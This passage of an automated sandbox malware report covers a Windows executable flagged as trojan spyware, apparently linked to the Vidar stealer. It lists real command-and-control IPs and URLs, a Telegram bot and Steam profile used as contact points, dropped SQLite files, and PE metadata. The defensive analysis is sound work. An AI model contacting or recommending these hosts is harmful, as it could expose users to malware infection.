http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199508624021	false		high
http://188.34.154.187:30303/addon.zip	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
https://t.me/	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://188.34.154.187:30303;	06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://t.me/looking_glassbotJ	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	50764714324176067669882221.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
http://188.34.154.187:30303	06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/:	06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303//	06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/addon.zip=u&y	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/n	06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5	06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com?fr=crmas_sfpf	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	50764714324176067669882221.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
http://23.88.46.113/667e85c8112da056f901292caf82b3ed8	06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.46.113/667e85c8112da056f901292caf82b3edx	06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/e5	06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.46.113:8A	06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://t.me/looking_glassbotC	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	50764714324176067669882221.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	false		high
http://188.34.154.187:30303/T	06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/V	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://23.88.46.113/667e85c8112da056f901292caf82b3ed	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.46.113:80	06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://188.34.154.187:30303/CVOHV.xlsx	06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.46.113:80/	06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0	06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://188.34.154.187:30303/addon.zip&u;y	06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	50764714324176067669882221.0.dr	false		high
http://188.34.154.187:30303/addon.zip0	06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s	06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.34.154.187	unknown	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
23.88.46.113	unknown	United States	18978	ENZUINC-US	false

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	877001
Start date and time:	2023-05-28 10:45:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	06625899.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/4@1/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 30.2% (good quality ratio 27.9%) Quality average: 72.1% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 100 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:46:24	API Interceptor	1x Sleep call for process: 06625899.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.34.154.187	S2Kxy4LZum.exe	Get hash	malicious	Vidar	Browse	188.34.154.187:30303/
	nXoW7Q0Jig.exe	Get hash	malicious	Vidar	Browse	188.34.154.187:30303/
	02914099.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	188.34.154.187:30303/
	x7qtITM1AN.exe	Get hash	malicious	Vidar	Browse	188.34.154.187:30303/
	07149199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	188.34.154.187:30303/
149.154.167.99	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	W6qKnnjMEi	Get hash	malicious	Anubis	Browse	t.me/jhzljkhbsdklzjdlkzj281679827sjah
	snfstBXgxa	Get hash	malicious	Anubis	Browse	t.me/cui8txvnmv

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	B6gXqbOxy7.exe	Get hash	malicious	Nymaim, RedLine, SmokeLoader, Vidar	Browse	149.154.167.99
	S2Kxy4LZum.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	nXoW7Q0Jig.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	08241599.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	02914099.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	x7qtITM1AN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	07149199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	01867799.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	149.154.167.99
	09563599.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	08023599.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	02630999.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader	Browse	149.154.167.99
	08851299.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02296399.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	9bVWYiN8FH.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Djvu, SmokeLoader	Browse	149.154.167.99
	LzYKn1o0p6.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	BkVZvouFD1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	B6gXqbOxy7.exe	Get hash	malicious	Nymaim, RedLine, SmokeLoader, Vidar	Browse	149.154.167.99
	8rUZJC9kIZ.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	149.154.167.220
	Statement.shtm.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	S2Kxy4LZum.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	nXoW7Q0Jig.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02914099.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	x7qtITM1AN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	07149199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	01867799.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	149.154.167.99
	08023599.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	08851299.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02296399.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	9bVWYiN8FH.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	LzYKn1o0p6.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	149.154.167.99
	BkVZvouFD1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Dekont_20230509140935165.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	149.154.167.220
	DHL_Documents_8355916__524256.PDF(61kb).exe	Get hash	malicious	AgentTesla, zgRAT	Browse	149.154.167.220
HETZNER-ASDE	B6gXqbOxy7.exe	Get hash	malicious	Nymaim, RedLine, SmokeLoader, Vidar	Browse	188.34.154.187
	S2Kxy4LZum.exe	Get hash	malicious	Vidar	Browse	188.34.154.187
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	188.34.154.187
	nXoW7Q0Jig.exe	Get hash	malicious	Vidar	Browse	188.34.154.187
	02914099.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	188.34.154.187
	x7qtITM1AN.exe	Get hash	malicious	Vidar	Browse	188.34.154.187
	JCBbeJDmh2.exe	Get hash	malicious	Amadey, Laplas Clipper, SystemBC	Browse	78.47.9.120
	07149199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	188.34.154.187
	allah.bat	Get hash	malicious	Quasar	Browse	195.201.57.90
	01867799.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	78.47.34.59
	08023599.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	78.47.34.59
	08851299.exe	Get hash	malicious	Vidar	Browse	78.47.34.59
	02296399.exe	Get hash	malicious	Vidar	Browse	78.47.34.59
	a02.exe	Get hash	malicious	Raccoon Stealer v2	Browse	148.251.234.93
	9bVWYiN8FH.exe	Get hash	malicious	Vidar	Browse	78.47.34.59
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	78.47.34.59
	LzYKn1o0p6.exe	Get hash	malicious	Vidar	Browse	78.47.34.59
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	78.47.34.59
	file.exe	Get hash	malicious	Unknown	Browse	94.130.164.47
	BkVZvouFD1.exe	Get hash	malicious	Vidar	Browse	78.47.34.59

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	B6gXqbOxy7.exe	Get hash	malicious	Nymaim	Browse	149.154.167.99
	S2Kxy4LZum.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	nXoW7Q0Jig.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02914099.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	01169399.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	149.154.167.99
	x7qtITM1AN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	07494499.exe	Get hash	malicious	Babuk, Djvu	Browse	149.154.167.99
	06411899.exe	Get hash	malicious	Babuk, Djvu	Browse	149.154.167.99
	07149199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	05495999.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	149.154.167.99
	02214199.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	149.154.167.99
	08177699.exe	Get hash	malicious	Babuk, Djvu	Browse	149.154.167.99
	08023599.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99
	08851299.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02705399.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	02296399.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	02705399.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Boletos_Nfe2726742235.164023.85214.lNk.lnk	Get hash	malicious	Unknown	Browse	149.154.167.99
	9bVWYiN8FH.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\22919964096183665961703616

Download File

Process:	C:\Users\user\Desktop\06625899.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\36067264576515806059430256

Download File

Process:	C:\Users\user\Desktop\06625899.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\50764714324176067669882221

Download File

Process:	C:\Users\user\Desktop\06625899.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\57469657185917597184786931

Download File

Process:	C:\Users\user\Desktop\06625899.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.134474155007553
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	06625899.exe
File size:	404992
MD5:	22cd094d925fb41f446ed4db24cc8c35
SHA1:	c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256:	9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
SHA512:	606163e06f58b8fa1003ca0aa9a8a30344fc49fe20259beda6ae6fb006f7a1440ac61a8ed7a79a64ac802618613943119fb7b2289718a341edf19f3a7fceb895
SSDEEP:	6144:QY/jZT7vRNMKOO3PFmc7rPZWM5khCVYPnZe+QSdixrmwVUTtiKG:Qq5hOOMc7fLVYPnZ3QSd8yFTtib
TLSH:	40847D1392A1BD40E9664F769E1FC6E8761EF5708F593B69322CBA1F48700F2D263B11
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...\|.......\|.......\|...H...EX..k...b.......\|...c...\|...c...\|...c...Richb...................PE..L......a...........

File Icon


Icon Hash:	514145494155691d

Static PE Info

General

Entrypoint:	0x404e59
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x61FA08E2 [Wed Feb 2 04:30:26 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2d9ed3462f8a74bfd1231e2e9de56b43

Entrypoint Preview

Instruction
call 00007F5B55084253h
jmp 00007F5B5507F8EDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F5B5507FA96h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F5B5507FAC0h
test ecx, 00000003h
jne 00007F5B5507FA61h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F5B5507FA5Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F5B5507FAA4h
test ah, ah
je 00007F5B5507FA96h
test eax, 00FF0000h
je 00007F5B5507FA85h
test eax, FF000000h
je 00007F5B5507FA74h
jmp 00007F5B5507FA3Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004012D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x445a8	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28c000	0x19398	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a6000	0xde4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3150	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4406a	0x44200	False	0.8737528669724771	data	7.818078308305934	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x46000	0x245844	0x1e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x28c000	0x19398	0x19400	False	0.37881922957920794	data	4.263849351344956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a6000	0x3450	0x3600	False	0.2173755787037037	data	2.4461769922107117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x28c730	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x28d5d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x28de80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x290428	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2914d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x291988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
